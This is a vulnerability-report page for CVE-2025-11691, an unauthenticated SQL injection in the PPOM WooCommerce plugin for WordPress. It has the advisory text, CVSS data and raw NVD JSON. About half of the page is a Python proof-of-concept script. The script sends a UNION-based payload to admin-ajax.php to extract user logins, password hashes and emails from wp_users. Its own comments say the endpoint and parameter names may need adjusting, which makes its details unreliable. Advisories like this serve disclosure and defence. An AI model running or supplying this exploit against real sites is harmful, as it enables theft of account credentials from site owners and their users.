Security Vulnerability Report
中文
CVE-2025-11691 CVSS 7.5 HIGH

CVE-2025-11691

Published: 2025-10-18 07:15:36
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The PPOM – Product Addons & Custom Fields for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the PPOM_Meta::get_fields_by_id() function in all versions up to, and including, 33.0.15 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This is only exploitable when the Enable Legacy Price Calculations setting is enabled.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

PPOM – Product Addons & Custom Fields for WooCommerce <= 33.0.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11691 - PPOM WooCommerce SQL Injection PoC # Vulnerability: Unauthenticated SQL Injection via PPOM_Meta::get_fields_by_id() # Affected: PPOM Plugin <= 33.0.15 (when "Enable Legacy Price Calculations" is enabled) import requests import sys TARGET_URL = "http://target-wordpress-site.com" def exploit_sqli(target_url): """ Exploit SQL Injection in PPOM plugin's get_fields_by_id() function. The vulnerable parameter is passed via POST/GET and concatenated directly into SQL query without proper escaping or prepared statements. """ # The injection point is in the field ID parameter # Example payload using UNION-based SQL injection to extract data injection_payload = ( "1 UNION SELECT user_login,user_pass,user_email,1,1,1,1,1,1,1,1,1,1,1,1,1 " "FROM wp_users WHERE ID=1-- -" ) # Endpoint that triggers the vulnerable function # Adjust based on actual application routes exploit_url = f"{target_url}/wp-admin/admin-ajax.php" # Data parameters that trigger the vulnerable code path data = { "action": "ppom_get_fields", "ppom_id": injection_payload, } try: response = requests.post(exploit_url, data=data, timeout=10) if response.status_code == 200: print(f"[+] Response received ({len(response.text)} bytes)") # Extract sensitive data from response if "admin" in response.text or "$" in response.text: print("[+] Potential sensitive data found in response") print(response.text[:500]) return response.text else: print(f"[-] Request failed with status: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None def check_vulnerability(target_url): """Check if the target is vulnerable by testing with a benign payload.""" test_payload = "1' AND '1'='1" normal_payload = "1" exploit_url = f"{target_url}/wp-admin/admin-ajax.php" # Test with normal input r1 = requests.post(exploit_url, data={ "action": "ppom_get_fields", "ppom_id": normal_payload }) # Test with injection payload r2 = requests.post(exploit_url, data={ "action": "ppom_get_fields", "ppom_id": test_payload }) if r1.status_code == 200 and r2.status_code == 500: print("[+] Target appears to be VULNERABLE to SQL Injection") return True else: print("[-] Target does not appear to be vulnerable") return False if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] print(f"[*] Testing target: {TARGET_URL}") if check_vulnerability(TARGET_URL): print("[*] Attempting exploitation...") exploit_sqli(TARGET_URL)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11691", "sourceIdentifier": "[email protected]", "published": "2025-10-18T07:15:35.707", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The PPOM – Product Addons & Custom Fields for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the PPOM_Meta::get_fields_by_id() function in all versions up to, and including, 33.0.15 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This is only exploitable when the Enable Legacy Price Calculations setting is enabled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/woocommerce-product-addon/trunk/classes/ppom.class.php#L337", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3379431%40woocommerce-product-addon&new=3379431%40woocommerce-product-addon&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/eefcc290-b7f7-4cf0-9ccc-db4c883d6426?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.